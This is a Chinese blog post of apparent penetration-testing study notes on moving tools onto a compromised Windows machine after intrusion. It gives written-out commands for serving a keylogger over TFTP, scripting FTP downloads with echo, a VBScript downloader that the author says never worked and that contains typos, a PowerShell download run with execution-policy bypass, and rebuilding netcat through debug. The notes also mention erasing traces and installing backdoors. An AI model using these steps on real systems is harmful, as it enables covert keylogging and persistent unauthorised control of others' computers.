kali渗透学习-后渗透利用阶段(windos上传工具)

最新推荐文章于 2024-06-03 18:45:00 发布
最新推荐文章于 2024-06-03 18:45:00 发布
阅读量293 收藏
点赞数
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43239236/article/details/106268708
版权

入侵成功后,后漏洞利用阶段
1.上传工具
2.提权
3.擦除攻击痕迹
4.安装后门

 长期控制
 Dump 密码
 内网渗透

后漏洞利用阶段最大的挑战 ----防病毒软件(免杀)
使用合法的远程控制软件
或者使用免杀技术

上传工具
实现持久控制和扩大对目标系统的控制能力
Linux系统自带的一些可利用下载工具

netcat
curl
wget

Windows缺少预装的下载工具
windos缺少预装的下载工具,可以有以下几种思路
非交互模式 shell有局限性(例如不会提示你输入密码,可以先将命令写入到一个文件,然后通过其他方式调用执行)
类 NC远程控制shell为非交互式

常用的几种传输文件思路

Tftp
Ftp
Vbscript(没有成功)
Powershell win7 win8
Debug

Tftp
【构造一个TFTP服务器,在服务器中放置工具木马等,再通过被控端连接下载】

XP、2003中默认安装,Win7、2008以后的系统需要单独添加,但经常被边界防火墙过滤。主流为FTP,是因为基于UDP协议,明文传输,不支持身份验证

利用kali

mkdir /tftp #创建tftp目录

chown -R nobody 设置权限所有者为nobody【无本地登录权限】

cp /usr/share/windows-binaries/whoami.exe /tftp/ #windows下查看当前用户

cp /usr/share/windows-binaries/klogger.exe /tftp/ #拷贝键盘记录器
在这里插入图片描述
atftpd --daemon --port 69 /tftp/ #daemon,用后台方式启动,主目录指向tftp
由于权限问题,会出现以下这个常见问题【启动进程不是tftp,我没有遇到】
在这里插入图片描述
需kill 543这个进程,使用chown -R nobody /tftp/ 【将所有者改成nobody】
在这里插入图片描述
重启服务
在这里插入图片描述
进行tftp文件传输
在这里插入图片描述
启动键盘记录器后查看进程tasklist #查看进程
在这里插入图片描述
键盘记录器会记录管理员的输入,再同目录下会生成记录键盘输入的文本文件(需要到winxp上操作记录,远程shell不会被记录)
在这里插入图片描述
查看记录结果
在这里插入图片描述
Ftp
先在kali上apt-get install pure-ftpd

使用脚本配置Ftp服务器【切记:设置的密码,下面echo会用到】

#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd yuanfh -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/                   #创建的ftp主目录
/etc/init.d/pure-ftpd restart

测试本地FTP服务器是否开启
在这里插入图片描述
因为非交互系统中,ftp传输,在password命令处无法显示,所以需要通过转换思路进行下载

思路:【将要实现的命令写到目标服务器的文本文件中,用ftp读取文本文件的命令进行下载】

C:\>echo open 192.168.1.127 21>ftp.txt
echo open 192.168.1.127 21>ftp.txt

C:\>echo yuanfh>>ftp.txt
echo yuanfh>>ftp.txt

C:\>echo password>>ftp.txt
echo password>>ftp.txt

C:\>echo bin>>ftp.txt
echo bin>>ftp.txt

C:\>echo GET whoami.exe >> ftp.txt
echo GET whoami.exe >> ftp.txt

C:\>echo GET klogger.exe >> ftp.txt
echo GET klogger.exe >> ftp.txt

C:\>echo bye >> ftp.txt
echo bye >> ftp.txt

##先将whoami,klogger等程序拷贝到ftphome目录【cp /tftp/* /ftphome/】

用ftp -s:ftp.txt调用

Vbscript(没有成功)
#VBS是windows系统上默认的解释型脚本语言,在win7后增加了perl

##通过web程序,http协议下载远程控制程序,需在kali启动apache2

root@kali:~# service apache2 start
root@kali:~# netstat -pantu | grep :80
tcp6       0      0 :::80                   :::*                    LISTEN      4433/apache2

进入apache2默认目录,拷贝文件

root@kali:~# cd /var/www/html
root@kali:/var/www/html# cp /ftphome/* .
root@kali:/var/www/html# ls
index.html  klogger.exe  whoami.exe
root@kali:/var/www/html#

粘贴以下命令到shell窗口

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXSEITTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXSEITTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXSEITTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXSEITTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Noting Then Set http = CreateObjiect("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Noting Then Set http = CreateObjiect("WinHttp.MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Noting Then Set http = CreateObjiect("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Noting >> wget.vbs
echo Set fs = CreateObject("Scrippting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Miidb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

cscript wget.vbs http://192.168.1.127/whoami.exe w.exe
【windows系统自带的cscipt命令去下载whoami.exe 命名成w.exe,传输完成后,需重启一下目标系统】

Powershell win7 win8
##需在windows系统下运行powershell脚本

$strongeDir = $pwd
$webclient = New-Object System.Net.WebClient
$url = "http://192.168.1.127/whoami.exe"
$file = "new-exsploit.exe"
$webclient DownloadFile($url,$file)

powershell.exe -ExecutionPolicy Bypass -NoLogo -Nonlnteractive -Noprofile -File wget.ps1

Debug
Debug是一种汇编、反汇编的16进制dump工具,作为文件传输,默认情况下只能传输64k字节的数据,大概思路就是将nc转换成16进制debug然后生成一个16进制文件,最后再反汇编回来称为nc工具
使用upx压缩文件进行压缩再进行传输

root@kali:~# upx -9 nc.exe                          #-9:最高程度压缩
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2013
UPX 3.91        Markus Oberhumer, Laszlo Molnar & John Reiser   Sep 30th 2013

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     59392 ->     29184   49.14%    win32/pe     nc.exe

将exe程序转化成16进制文本格式
wine /usr/share/windows-binaries/exe2bat.exe nc.exe nc.txt
将文本文件中的16进制代码(除倒数两行外)全部复制到shell窗口中

debug<123.hex #生成1.dll

copy 1.dlll nc.exe

唐吉可黄
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kali [Empire] 后渗透测试
weixin_45253622的博客
03-23 858
Empire的使用 安装 git clone https://github.com/EmpireProject/Empire.git cd setup ./install.sh 进入Empire目录,./empire 打开Empire 输入help查看帮助 启动 ./empire
kali渗透学习-后渗透利用阶段(本地提权,抓包嗅探)
weixin_43239236的博客
01-23 491
本地提权 已实现本地低权限账号登录 远程溢出 直接获得账号密码 希望获取更高权限 实现对目标进一步控制 系统账号之间权限隔离 操作系统安全的基础 用户空间 内核空间 系统账号 用户账号登陆时获取权限令牌 账号无需用户登陆已在后台启动服务 Windows的用户权限 user<Administrator<System Linux的用户权限 User<Root 获取Windows system权限的几种方法 1、利用at命令直接会调用system【at /?】##只能在XP与2003的系统上使用
kali linux之msf后渗透阶段
weixin_30606461的博客
03-11 560
已经获得目标操作系统控制权后扩大战果 提权 信息收集 渗透内网 永久后门 基于已有session扩大战果 绕过UAC限制 use exploit/windows/local/askset session -idset filenameuse exploit/windows/local/bypassuacuse exploit/windows/local...
【网络安全】记一次红队渗透实战项目
最新发布
qingkahui24689的博客
06-03 1435
mcrypt 是php里面重要的加密支持扩展库,主要是用mcrypt 扩展库中各种加密函数对用户输入内容进行转换功能。就是用户输入的数据转换为base64编码和解码功能,还有将字符串转换为 8-bit 字符串功能。PHP存在四种过滤器:
kali metasploit 后渗透Post模块
qq_51685718的博客
10-28 407
如果是获取shell后权限是比较低的,post模块中有一个检测目标系统补丁然后会给出相应exp提权的功能。我这由于没安装火狐导致报错。
比CMD更强大的命令行:WMIC后渗透利用(系统命令)
热门推荐
discover2210212455的博客
09-15 5万+
写在前面的话 在这篇文章中,我们将讨论如何在攻击的后渗透利用阶段使用WMIC(Windows Management InstrumentationCommand Line)。当攻击者在远程PC上拿到meterpreter会话之后,他们就可以枚举大量的系统信息,并利用WMI命令行工具来进行更深程度的操作。 首先,我们会介绍如何拿到远程PC的meterpreter会话。拿到会话之后,我们还会告诉大...
渗透测试中的文件传输技巧
weixin_30496431的博客
04-12 476
Referrence:https://xax007.github.io/2019-01-13-post-exploitation-file-transfer-tips/ 目录 搭建 HTTP server Python PHP 5.4+ Ruby Ruby 1.9.2+ Perl busybox httpd Download files from HTTP ser...
渗透测试流程(二) 威胁建模、漏洞分析与漏洞利用阶段
ShouYWang的博客
02-17 1000
本篇文章将介绍渗透测试中最为精彩的渗透利用阶段
漏洞分析阶段 PTES
hkzck的博客
06-28 390
漏洞分析阶段。我们的目标是:“找到蛀牙”。漏洞分析是在战略确定后,从战术面确定如何取得目标系统的访问控制权。找出具体可利用漏洞,搜索或自行编写渗透代码,找出可以实施的渗透攻击点,搭建模拟环境加以验证。 【Key Words】漏洞分析、渗透攻击验证代码(POC) 你和甲方爸爸oppo谈完【前期交互阶段完成】, 其实早就偷偷收集情报了,过了两天情报收集完成【情报收集阶段完成】, 你看到了登陆界面,一顿奇(xia)思(ji)妙(er)想,给出了威胁建模报告【威胁建模阶段完成】 苦逼的打工仔开始了漏洞验证
安全漏洞--基于NDAY和0DAY漏洞免杀技巧
关注互联网安全的小虾米一枚
05-09 8600
一 漏洞简介 漏洞开发者在利用0day和Nday时,除了在逃过windos的自身安全机制的基础上,不可避免的要接触到与杀软对抗的工作,就一般情况来看,如果针对特定的目标杀软还是有很大可能可以绕过,难点是通用所有的杀软。 另外值得注意的一点,现今主流杀软很多,在通用的前提下,免杀工作往往占用很多时间。 二 构造POC 2.1 构造POC
内网渗透综述
kracer的博客
12-01 8379
目录 一、什么是内网渗透 二、内网基础知识 三、内网渗透基本流程 一、什么是内网渗透 内网是一个只有组织工作人员才能访问的专用网络,简而言之就是不可简单地通过外部公网ip进行访问到的公司内部网络。对于一个大型公司的网络系统,通过信息收集找到网站漏洞可以顺利通过公网进入公司内部网络时,进一步对公司内部网络的渗透攻击即为内网渗透。 与外网渗透区别: 1、外网渗透更侧重于找漏洞寻找突破口,考验的是白帽的综合能力,外网渗透的最终还是为了进入内网。 ...
Kali Linux安全渗透教程全
07-07
偶然看到Kali Linux上架win10商店了,所以特意传上来给一些初学者学的
Kali Linux 网络安全渗透测试
06-02
为什么学网络安全?1. 市场巨大每年各安全厂商收入高达400亿左右,随着5G的发展,万物互联时代,市场将进一步扩大。2. 薪资高网安人才的匮乏,用人开出招聘薪资往往高于求职者的预期。3. 靠能力说话在网络安全专业,专业技能竞争力要远高于学历本身。在网安专业只看能力不看学历也成了大家公认的原则。 网络安全未来10年的发展前景现代人的生活与网络息息相关,个人、企业信息的安全显示尤为重要,2018年报告的信息安全事件比2017年有所增加,一年几千万次。应对网络安全挑战,已越来越被重视。不管你是否从事网络安全行业相关工作,信息安全都显得越来越重要。 注意:视频教学内容仅用于网络安全渗透测试。其他行为,自己承担相应的责任,与作者无关。 
Kali-linux渗透攻击应用
weixin_34138377的博客
04-18 3312
前面依次介绍了Armitage、MSFCONSOLE和MSFCLI接口的概念及使用。本节将介绍使用MSFCONSOLE工具渗透攻击MySQL数据库服务、PostgreSQL数据库服务、Tomcat服务和PDF文件等。 6.4.1 渗透攻击MySQL数据库服务 MySQL是一个关系型数据库管理系统,由瑞典MySQL AB公司开发,目前属于Oracle公司。在Metasploitable系统中...
渗透攻防工具篇-后渗透阶段的Meterpreter
qdslg的专栏
07-29 4301
文章作者  zusheng 文章来源  i春秋原创奖励计划 时间        2016年8月23日 14:38:43 前言熟悉Metasploit的应该对Meterpreter不陌生,作为后渗透阶段的利器,其强大之处可想而知,那么本篇文章就带大家来学习一下Meterpreter,目的在于让大家了解它的常用命令和使用方法。目录第一节 初识Meterpreter 1.1、什么是Meterpret...
Kali Linux渗透测试 146 Mestasploit 后渗透测试阶段
kevinhanser
04-19 2968
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 1. 准备工作 已经获得目标系统控制权后扩大战果提权 信息收集 渗透内网 永久后门 基于已有 session 扩大战果msfvenom -a x86 –platform windows -p windows/
kali渗透学习-后渗透利用阶段(wce和漏洞利用)
weixin_43239236的博客
01-23 409
wce工具 理解传输身份验证使用ntlm协议的原理 wce和Pwdump不同,前者是在内存中找到明文的安全包Digest Authentication Package提取用户明文密码,后者是在sam数据库中找到用户hash kali工具路径/usr/share/wce/ 需要管理员权限(比较理想的情况,可以进一步但探测其他的账密码) wce-universal.exe -l :查看当前登录账号的密码的密文形式的哈希值,只能读到已经登录的账号,没有未登录的账号【lmhash:nthash】 -lv:表示查
Kali Linux渗透基础知识整理(三):漏洞利用
weixin_34056162的博客
08-05 917
漏洞利用阶段利用已获得的信息和各种攻击手段实施渗透。网络应用程序漏洞诊断项目的加密通信漏洞诊断是必须执行的。顾名思义,利用漏洞,达到攻击的目的。 Metasploit Framework rdesktop  + hydra Sqlmap Arpspoof tcpdump + ferret + hamster Ettercap SET Metasploit Frame...
网络安全工程师教你Kali Linux:如何防御计算机永恒之蓝勒索病毒?
Kali与编程
09-12 1548
课前声明: 1、本分享仅做学习交流,请自觉遵守法律法规! 2、搜索:Kali与编程,学习更多网络攻防干货! Kali Linux渗透利用msf框架对win7进行永恒之蓝渗透【防御篇】 防御ms17_101的方法: 1.安装杀毒软件 2.关闭445端口 3.打开计算机的防火墙功能 防御方式: 一、关闭文件共享 1.1首先我们接着永恒之蓝攻击篇,测试是否能够连接目标电脑。 可以看到我们已经成功连接。 2.1接着我们打开控制面板->网络和 Internet->网络和共享中心->高级共享设置
Kali Linux:渗透测试工具大全
Kali Linux中包含了丰富的渗透测试工具,这些工具主要分为以下几类: 1. **信息收集**: - **Acccheck**:用于扫描脆弱的用户名和密码。 - **Amap**:检测服务器上运行的服务和应用。 - **Automater**:自动化...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值